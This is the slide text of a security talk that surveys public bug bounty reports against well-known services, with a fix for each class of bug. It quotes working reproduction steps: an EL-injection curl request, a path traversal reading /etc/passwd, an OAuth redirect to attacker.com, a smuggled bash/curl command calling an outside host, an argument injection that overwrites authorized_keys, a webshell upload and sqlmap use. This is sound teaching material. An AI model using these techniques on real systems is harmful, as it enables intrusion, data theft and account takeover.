Security is hard. We all miss things. Attackers find things.
"You must learn from the mistakes of others. You can't possibly live long enough to make them all yourself." -Samuel Levenson
This talk is a fun, fast-moving survey of some of the best recent bug bounty finds against some of the largest and best-known applications in the world. Some of the bugs are really simple, some are super complex, but all are entertaining. As we go through these, we'll take a look at what caused the issue, and how to fix it.
From this talk, you'll walk away with:
* a few minutes of entertainment
* a view of the wide breadth of security issues
* practical ideas on testing and shoring up security in your own applications
* (maybe) a new side gig as a bug bounty hunter!
2. Me
• Director, Product Security & OWASP guy
• twitter: _jtmelton
• github: jtmelton
• email: jtmelton@gmail.com
3. Agenda
• intro
• for each bug
• understand issue
• understand fix
• pointers to helpful tools
• wrap-up
4. Intro
• Security bugs are just bugs
• There are many types (714 weaknesses in
CWE across 237 categories)
• They go by many names (frustratingly
inconsistent)
• There is a wide range of complexity
• There is no such thing as a “top 10” for you
(see ecological fallacy)
5. A few bugs …
• Account Takeover
• Direct Object Reference
• XXE
• XSS
• RCE
• OS Command Injection
• Subdomain Takeover
• CSRF
• Sql Injection
• Insecure 3rd party libraries
• Missing Access Control
• SSRF
• Parameter Pollution
• Privilege Escalation
• Insecure Configuration
• Deserialization
• Authentication Bypass
• Hardcoded Password
8. Insecure 3rd Party
Libraries
“One of the DoD applications uses a java
library which is vulnerable to expression
language injection. Using only an URL I was
able to inject java code. I made a simple PoC
that requests a name resolution to a DNS
server.
The application at https://███ uses
Primefaces version 5.3 which is vulnerable to
Expression Language injection through
DynamicContent generator.”
9. Insecure 3rd Party
Libraries
“With the code attached generate the payload
encrypted with the default key "primefaces".
With the payload from #1, send a GET request
using curl (curl -vk https://████/
javax.faces.resource/
dynamiccontent.properties.xhtml?
pfdrt=sc&ln=primefaces&pfdrid=<YOUR_PAYL
OAD_HERE>”
10. Insecure 3rd Party
Libraries
“You will receive a name resolution request for
remoteMalJarUrl from the DoD application.
We could use this DNS request to exfiltrate
data from the server. And as I said,
theoretically I could also delete files from the
server using the File class.”
11. Insecure 3rd Party
Libraries
Recommendations:
1. Update your libraries regularly! Even use
auto-updaters where possible (requires test
confidence)
2. Scan for known vulnerabilities. (OWASP
Dependency Check, Dependency Track)
3. Build a BOM (Dependency Track)
14. Privilege Escalation
“Because lack of security, attacker will be able
to remove original log file and replace it will a
symlink to other file.
After finishing job, host machine copy file from
docker container.
Because the original log file has been removed,
the host machine will copy the symlink file.
But the problem is it doesn't copy the linked
file in container, it copies the linked file in the
HOST MACHINE.”
17. Privilege Escalation
Recommendations:
• “We're currently in the process of deploying a
remediation involving removing symlinks from
data uploaded from the worker.”
• Sandbox sensitive processes
• Monitor logs
• Understand technology choices (docker
reading from host)
22. CSRF
“The POST request to /ocs/v2.php/apps/
provisioning_api/api/v1/config/apps/core/
encryption_enabled is missing a unique token,
so that if an attack can trick an admin user
with an active session to visit an attacker
controlled website, he/she can control the core
application setting "encryption_enabled"”
24. CSRF
“We are going to prevent this, but since you
can not abuse it really without being an admin,
and at that point you can also revert our patch,
it's not eligible for a bounty.”
30. SSRF
“By sending a malformed HTTP request to
alerts.newrelic.com, it's possible to trick that
server into routing the request to an arbitrary
location. This can be exploited by an internet
based attacker to access internal services -
doing a quick scan of █████████ I was
able to access █████ etc.”
33. SSRF
“This code may look faultless - it takes the user-supplied
URL, replaces the domain with the hard-coded backend
server's address, and passes it along. Unfortunately the
Apache HttpComponents server library failed to require
that paths start with '/'. This meant that when I sent the
following request: ”
The code above rewrote this request as http://public-
backend@burp-collaborator.net/ and routed the request
to burp-collaborator.net.
41. File Disclosure
“CVE-2019-11510 is a file disclosure due to
some normalization issues in pulse secure. I
was able to reproduce this by grabbing /etc/
passwd.
https://$hax/dana-na/../dana/html5acc/
guacamole/../../../../../../etc/passwd?/dana/
html5acc/guacamole/#”
42. File Disclosure
“The file /data/runtime/mtmp/lmdb/dataa/data.mdb
contains clear context passwords and usernames,
when a user logs in from here we can then access the
Pulse secure instance.”
43. File Disclosure
Recommendations:
• When doing file operations, always start with
a secure prefix
• Use whitelisted options where possible
• Normalize (canonicalize) input otherwise,
being careful to do full input validation
(length, type, encoding, semantic value, etc.)
48. Insufficient
Authorization
“For public projects, GitLab allows to restrict CI
pipelines to project members only (public pipelines
disabled). However, in this case, the merge request
widget still renders the scanning reports result,
which is the outcome of a CI pipeline.
Unauthorized users have access to critical
information like the container scanning or
dependency scanning report, thus have a lot of
insight of an application. By knowing the found
vulnerabilities (or still existing), they could attack
the target application.”
49. Insufficient
Authorization
“Create a public project, restrict CI pipeline access to
project members, and disable public pipelines
Push a new branch and add .gitlab-ci.yml file, and
create a merge request with those changes
As an unauthorized user, visit the page https://
example.gitlab.com/<namespace>/<public-project-
name>/merge_requests/1/merge_requests/1/
c o n t a i n e r _ s c a n n i n g _ re p o r t s a n d h t t p s : / /
example.gitlab.com/<namespace>/<public-project-
name>/merge_requests/1/merge_requests/1/
dependency_scanning_reports“
55. Subdomain Takeover
1. Buy a domain at a hosting site
(123xyz.hosting.com)
2. Get a vanity domain (2017event.mysite.com)
3. Create cname record for vanity -> hosting
4. Hosting site expires (not needed anymore), but
cname is still there
5. Attacker registers hosting domain
6. Vanity domain now points to attacker site
56. Subdomain Takeover
“The dangling CNAME record of datacafe-
cert.starbucks.com is pointing to
s00397nasv101-datacafe-
cert.azurewebsites.net which was not claimed
by you. I registered a service with this name
and therefore was able to takeover the
subdomain. Every attacker doing this has
afterwords full control over the contents
served on this subdomain.”
57. Subdomain Takeover
1. Using dig, I was able to determine that the subdomain
'd02-1-ag.productioncontroller.starbucks.com' was
vulnerable to takeover. The record showed status:
NXDOMAIN and was pointing to the CNAME:
3edbac0a-5c43-428a-b451-a5eb268f888b.cloudapp.net.
2. Using this information, I was able to create a new Azure
Cloud Service with the name '3edbac0a-5c43-428a-b451-
a5eb268f888b'. This would resolve to the CNAME record
mentioned above.
3. I then crafted a website and uploaded it to the cloud
service using this as a guide: https://docs.microsoft.com/
en-us/azure/cloud-services/cloud-services-how-to-create-
deploy-portal.
4. I was then able to view the uploaded site at http://d02-1-
ag.productioncontroller.starbucks.com
63. Web Cache Poisoning
“On https://paypal.com/, you could impact
core functionality by using an invalid
Transfer-Encoding header to replace
JavaScript files
from www.paypalobjects.com with the
message '501 Not Implemented'. This was
patched and awarded a $9,700 bounty.”
71. Insecure Configuration
“The slack binary from the Linux desktop
application is no position independent
executable:
$ file usr/lib/slack/slack
usr/lib/slack/slack: ELF 64-bit LSB executable,
x86-64, version 1 (SYSV), dynamically linked,
interpreter /lib64/ld-linux-x86-64.so.2, for
GNU/Linux 2.6.32, stripped
(pie executables report either "LSB shared
object" or "LSB pie executable”.)"
72. Insecure Configuration
“Position independent executables are
required for full ASLR support on Linux. Non-
pie-binaries are loaded to a fixed location, thus
allowing ROP attacks.
I'm aware that technically this is not a
vulnerability, but a lack of a hardening feature.
However given that ASLR is generally
considered standard practice these days and
that lack of it can mean very simple bugs can
directly lead to code execution I think it
deserves to be fixed.”
73. Insecure Configuration
“A simple memory corruption bug like a
buffer overflow can easily lead to a remote
code execution bug. With ASLR these bugs
are much harder and sometimes impossible to
exploit.”
79. Insecure Configuration
“Nginx misconfiguration leading to direct
PHP source code download
data.gov uses nginx as the web server. Due to
the server misconfiguration, instead of
processing the file, the .php source code is
send to the client requesting from the direct
url.”
80. Insecure Configuration
“attacker can download any .php file on the
web leading to huge information about the
server. data.gov implement saml (open-
source), the config.php file in the saml config
folder can be downloaded by the direct url
request, it contains sensitive information such
as: auth.adminpassword, tecnical contact
email, and (possibly) database password.”
81. Insecure Configuration
Recommendations:
• Make sure to enable secure default
configurations
• Use linters and scanners looking for bad
configs (language / framework specific
usually)
• If there’s a website, use active DAST
scanners (ZAP, Burp, Arachni, etc.)
86. HPP
“I would like to report an issue on Digits web
authentication which allows attackers to retrieve the
OAuth credential data of an application victims
authorized.”
“…the login page has 2 parameters, consumer_key
and host. The former identifies which app a user
wants to authenticate, and the latter specifies which
domain the OAuth credential data is sent to after
authentication. In order to prevent other websites to
pretend to be the application, the host parameter
will be validated to see if it matches the registered
domain of the app. ”
88. HPP
However, the validation can be bypassed with HPP (HTTP
Parameter Pollution). If we supply multiple host parameters,
the validation will only compare the first one but the last one
is used in the transfer step instead.
https://www.digits.com/login?
consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3
A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.c
om
The first host (host=https://www.periscope.tv) is validated
but not the second one. After authentication the second host
(host=https://attacker.com) is used as the transfer origin.
90. HPP
Recommendations:
• Understand the way your language /
framework / server handles multiple
parameters of the same name
• Understand server and client side HPP
• Input validation for HPP (reject/report)
95. Command Injection
“OS Command Injection in Nexus Repository
Manager 2.x (bypass CVE-2019-5475)”
“The Nexus Yum Repository Plugin is
vulnerable to Remote Code Execution. All
instances using CommandLineExecutor.java
with user-supplied data is vulnerable, such as
the Yum Configuration Capability. ”
96. Command Injection
Take a look at the patch for CVE-2019-5475
https://github.com/sonatype/nexus-public/
commit/
7b9939e71693422d3e09adc3744fa2e9b3a62a63
#diff-4ab0523de106ac7a38808f0231fc8a23R84
The getCleanCommand method is not
completely filtered and can still be bypassed.
97. Command Injection
Steps To Reproduce:
1.Navigate to "Capabilities" in Nexus
Repository Manager.
2.Edit or create a new Yum: Configuration
capability
3.Set path of "createrepo" or "mergerepo" to
an OS command (e.g. /bin/bash -c curl${IFS}
http://192.168.88.1:8000/ || /createrepo)
103. Hardcoded Key
“While going through Github search I
discovered a public repository which contains
Jumbcloud API Key of Starbucks.”
104. Hardcoded Key
POC:
List systems
curl -H "x-api-key: ████████" "https://
console.jumpcloud.com/api/systems"
There are multiple AWS instances present
curl -H "x-api-key: █████" "https://
console.jumpcloud.com/api/systemusers"
SSO Applications curl -H "x-api-key: ██████"
"https://console.jumpcloud.com/api/applications" AWS
login SAM config is presents. This would leads to AWS
account takeover
105. Hardcoded Key
This issue impact is critical as through this API
anyone could:
Execute commands on systems https://
docs.jumpcloud.com/1.0/commands/create-a-
command
Add/Remove users which has access to internal
systems
AWS Account Takeover
106. Hardcoded Key
Recommendations:
• Don’t hardcode keys
• Use HSM, Hashicorp Vault, etc.
• Run scanning tools looking for hardcoded
passwords and keys (git-secrets, gitleaks,
gitrob, trufflehog)
111. RCE
1.Create a wiki new wiki page called page with the commit
message controlled content
2.Search for the wiki blob via the Search API, with the injected
ref flag: curl --header "PRIVATE-TOKEN: $TOKEN" 'http://
gitlab-vm.local/api/v4/projects/5/search?
scope=wiki_blobs&search=page&ref=--output=/tmp/file'
3.See that the file has been created:
git@gitlab-vm:~$ cat /tmp/file
commit f00f9538d29b176e9dfb2eb1bfe1eab190cad3d9
Author:Administrator <admin@example.com>
Date: Wed Jul 24 13:08:51 2019 +0000
controlled content
112. RCE
1.Create a new rsa key
2.Create a new wiki page setting the commit message to the rsa public key
3.Run the Search API with ref=--output=/var/opt/gitlab/.ssh/authorized_keys
4.ssh into gitlab using the created key:
$ ssh git@gitlab-vm.local -i gitlab
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-70-generic x86_64)
$ id
uid=998(git) gid=998(git) groups=998(git)
$ cat /var/opt/gitlab/.ssh/authorized_keys
commit 00c8e52996654d02bcbdba47dc25ee73671cbfd6
Author:Administrator <admin@example.com>
Date: Wed Jul 24 12:56:23 2019 +0000
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQCxsqkWZobL5DBOnM3rtE7ZDP4d9v0lABJRGJbovHHTNY2iH
3x3pjjerPfLDO21Gkyfzn4J+x6O6GleMAB5nxnZRH7E44khfW6Ldql29Rv2Q/
IYCsBSKxGT6RCOFusoRi1uHlQmexIh4gZkmPeFfDLTy70Xv3FpPLfKE/
EiVOjuEtY9JUC4MVlPHaTzZ2HE4sZT5tvcm9YtSpjT2v0SMR8uCXcKMAx4Tsu/
Un2N5UziXgtRF+vD0fRhNyKIkOtULwBgWkL5RE71vYbxOhviqTAld7r70TIWSzSUHcUewbMS5XcEdBwl3XI
/9qzo+jOA0Ulf2bkkROpELBoHwfLdpu9p will@MacBook-Pro.local
118. RCE
Webshell via File Upload on
ecjobs.starbucks.com.cn
1.Sign in the url(https://ecjobs.starbucks.com.cn)
and direct to the resume endpoint.
2.Use burp suite tools to interrupt the avatar
upload request.
3.Replace the filename type .jpg to asp which
have a space character behind and modify the
content
After that you have uploaded malicious files on
the server and run any os command on server
you wanted.
126. Insecure Design
“When requesting a ride, it was possible to
intercept the request and forward it with 3
random characters at the end of the
paymentProfileUuid parameter.
This would cause the ride to disappear from
both the Rider and Driver's trip history, the
Rider would not be charged, and the Driver
would not receive payment for the trip.”
132. Sqli
Steps to Reproduce:
1.python sqlmap.py -u https://REPLACE-ME/public/
saveCount.cfm?countID=4 --level=3 --risk=3
Impact
Attacker can take control over the database server.
138. Hardcoded Token
“GitHub is a truly awesome service but it is
unwise to put any sensitive data in code that is
hosted on GitHub and similar services as i was
able to find github token indexed 7 hours
Ago by user ██████ - Software Engineer -
Snap Inc”
139. Hardcoded Token
“I know it’s not my right to ask, just out of
curiosity, what was the impact of the above if
it reached bad hands? Doesn’t the google
authentication somehow protect the access to
this site even with the token leaked ?
The web interface needed a valid snap account,
but not the API.”
140. Hardcoded Token
Recommendations:
• Don’t hardcode tokens
• Use HSM, Hashicorp Vault, etc.
• Run scanning tools looking for hardcoded
tokens (git-secrets, gitleaks, gitrob,
trufflehog)
145. Insecure Design
When a user creates an account using Google or
Facebook and does not set an additional
password, it is possible to set their passwords
via CSRF.
Since the account is created using a social media
account, no existing password check is needed
and the CSRF check on the endpoint is broken.
An attacker can take over of accounts created
using Google or Facebook.
151. Insecure Design
Chained Bugs to LeakVictim's Uber's FB Oauth Token
1.Prompt OAuth authorization on facebook.com
2.Redirect to https://auth.uber.com/login?next_url=https://
login.uber.com/logout from Facebook
3.Redirect to https://login.uber.com/
logout from auth.uber.com
4.Redirect to attacker site from Referer header and return
the token
When combined, this would have allowed for a full account
takeover
157. Account Takeover
“Through the endpoint at /rt/users/
passwordless-signup it is possible to change
the password of any Uber user, given
knowledge of their phone number (or by just
enumerating phone numbers until one is found
that is registered with Uber - not too hard
given the number of Uber users).”
164. Insecure Design
“There is a vulnerability in Vimeo which allows
any user to watch password video without the
password.
A user can like a passworded video without
password, then the user can watch the video
on Couchmode without the password.”
171. Insecure Design
“I found a way to become a verified GitLab
team member on Slack. By doing so, I gained
access to dozens of channels possibly
containing sensitive information. ”
181. There is hope …
• Follow security design principles
• Keep knowledge current
• Spend effort throughout SDLC
• Focus on key controls (2fa, input validation)
• Work on prevention, but also detection and response
• Patch
• (try bug bounties - make some extra $)